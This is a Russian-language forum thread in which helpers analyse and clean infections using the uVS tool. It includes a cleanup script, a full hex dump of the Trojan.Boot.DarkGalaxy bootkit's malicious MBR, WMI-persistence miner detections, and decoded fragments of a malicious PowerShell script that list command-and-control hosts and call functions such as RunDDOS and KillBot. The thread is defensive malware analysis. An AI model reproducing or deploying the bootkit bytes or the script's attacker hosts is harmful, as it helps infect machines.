поговорить о uVS, Carberp, планете Земля

RSS
Обсуждаем Carberp всех модификаций :)


Цитата
;uVS v3.71 script [http://dsrt.dyndns.org]

zoo %SystemDrive%\DOCUMENTS AND SETTINGS\HOUSE\ГЛАВНОЕ МЕНЮ\ПРОГРАММЫ\АВТОЗАГРУЗКА\IGFXTRAY.EXE
bl 6D99C48BBD436116B78A04997D854F57 164352
delall %SystemDrive%\DOCUMENTS AND SETTINGS\HOUSE\ГЛАВНОЕ МЕНЮ\ПРОГРАММЫ\АВТОЗАГРУЗКА\IGFXTRAY.EXE
delall %SystemDrive%\DOCUMENTS AND SETTINGS\ALL USERS\APPLICATION DATA\ICQ\ICQNEWTAB\NEWTAB.HTML
regt 1
regt 2
regt 7
regt 18
deltmp
delnfr
restart
Изменено: Арвид - 22.11.2011 13:07:19
Правильно заданный вопрос - это уже половина ответа

Ответы

Пред. 1 ... 142 143 144 145 146
Цитата
RP55 RP55 написал:
А здесь у нас WMI...
и не только.
возможно было два конкурирующих продукта майнеров (BOOT.DarkGalaxy
https://www.virustotal.com/ru/file/8a7f542b6cff744dd7d80eb510b6359e9214640c03ded5dc­1acfe5274d891103/analysis/1540003309/
и WMI-майнер AdylKuzz)

Цитата
Полное имя                  MBR#0 [931,5GB]
Имя файла                   MBR#0 [931,5GB]
Тек. статус                 ?ВИРУС? ВИРУС загрузчик
                           
Обнаруженные сигнатуры      
Сигнатура                   Trojan.Boot.DarkGalaxy.a [Kaspersky] (delall) [глубина совпадения 64(64), необх. минимум 64, максимум 64] 2018-09-14
                           
www.virustotal.com          Хэш НЕ найден на сервере.
www.virustotal.com          2018-10-20
Kaspersky                   Trojan.Boot.DarkGalaxy.a
DrWeb                       Trojan.NtRootKit.19689
                           
Сохраненная информация      на момент создания образа
Статус                      загрузчик
Размер                      440 байт
                           
Доп. информация             на момент обновления списка
SHA1                        70AF4248427B9FDB75AEB76CF5DB95D2FA55B803
                           
#BINOBJ#                    29DB29C0FA5317368926FE7BBCFE7B1E6660531F3EA1130424FC83E8403E­A31304C1E0068EC0FC0E58C1E004E8000083E82F5E01C631FFB90001F3A5­1E066A0007B83C02B90300BA8000BB007ECD13071FBE047EBF0002E80500­0668BE00CB60BB008029ED29D229C029C94DE8030061C3A4E8400072FA41­E83500E34073F983E903720688CCACF7D09531C9E8210011C9750841E819­0073FB414181FD00F383D1018D03961E06061FF3A4071F96EBC2E8020011­C901DB7504AD11C093C3B8AA55CD153D55AA7403E8350131D28EC2B80102­B90200BA8000BB007CCD1366611F5CEA007C000000000000000000000000­000000000000000000000000000000000000000000000000000000000000­000000000000000000000000000000000000000000000000000000000000­000000000000000000000000000000000000000000000000000000000000­000000000000000000000000000000000000000000000000000000000000­000000000000000000000000000000000000000000000000000000000000­000000000000000000000000000000000000000000000000000000000000­00000000000000000000000000000000002C4463FA42EBE5000000010100­07FEFFFF3F000000809D841E00FEFFFF07FEFFFFBF9D841E98E5691800FE­FFFF07FEFFFF5783EE366AD6813D00000000000000000000000000000000­55AA
кроме того, там же,
по уже после очистки от BOOT.DarkGalaxy, система была не пропатчена, и еще раз произошло заражение через сетевую атаку и WMI

можно предположить, что на этот раз в WMI был прописан запуске через powershell закодированного скрипта.

Цитата
powershell.exe в Windows
и грузит ЦП на 50%

Цитата
Процесс: 1
Spyware.InfoStealer.Themida, C:\WINDOWS\TEMP\COHERNECE.EXE, Проигнорировано пользователем, [8497], [529451],1.0.7465

Модуль: 1
Spyware.InfoStealer.Themida, C:\WINDOWS\TEMP\COHERNECE.EXE, Проигнорировано пользователем, [8497], [529451],1.0.7465

Инструментарий управления Windows (WMI): 3
Hijack.BitCoinMiner.WMI.Generic, \\WIN-5CAGQT8ID9L\ROOT\subscription:__FilterToConsumerBinding.Consumer="CommandLineEventConsumer.Name="Windows Events Consumer"",Filter="__EventFilter.Name="Windows Events Filter"", Проигнорировано пользователем, [14167], [528077],1.0.7465
Hijack.BitCoinMiner.WMI.Generic, \\WIN-5CAGQT8ID9L\ROOT\subscription:__EventFilter.Name="Windows Events Filter", Проигнорировано пользователем, [14167], [528077],1.0.7465
Hijack.BitCoinMiner.WMI.Generic, \\WIN-5CAGQT8ID9L\ROOT\subscription:CommandLineEventConsumer.Name="Windows Events Consumer", Проигнорировано пользователем, [14167], [528077],1.0.7465

+
добавлю строки из раскодированного скрипта.
взят из другого примера.

Цитата
$se=@(('update.7h4uk.com'),('info.7h4uk.com'),('185.128.43.62'),('185.234.217.139'))


$defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs))

RunDDOS "cohernece.exe"

KillBot('System_Anti_Virus_Core')
ESET machine-learning engine Augur versus the most infamous ransomware families of 2017

(ESET машинное обучение в движке Augur  против наиболее известных семейств ransomware 2017 года)


Чтобы продемонстрировать результаты Augur, мы протестировали его ранние сборки, полученные в первые месяцы 2017 года, против самых распространенных штампов ransomware, ориентированных на бизнес-среду в конце этого года. Набор тестов включал в себя образцы Diskcoder.C / NotPetya, DiskCoder.D / BadRabbit и WannaCryptor.D / WannaCry, а также множество вариантов Crysis ransomware.

Результаты показывают, что, несмотря на то, что модель Augur на несколько месяцев старше образцов вредоносных программ, коэффициент обнаружения файлов высокий, в некоторых случаях близок к безупречному. Тем не менее, самым важным результатом является то, что Augur смог правильно идентифицировать вредоносный характер образца в момент его запуска в память зараженного устройства. Это предоставит защитникам возможность остановить угрозу до того, как она может нанести серьезный ущерб в инфраструктуре компании.



https://www.eset.com/us/about/newsroom/corporate-blog/eset-machine-learning-engine-augur-versus-the-most-infamous-ransomware-families-of-2017/

https://www.welivesecurity.com/wp-content/uploads/2018/08/Can_AI_Power_Future_Malware.pdf
Пред. 1 ... 142 143 144 145 146
Читают тему (гостей: 3)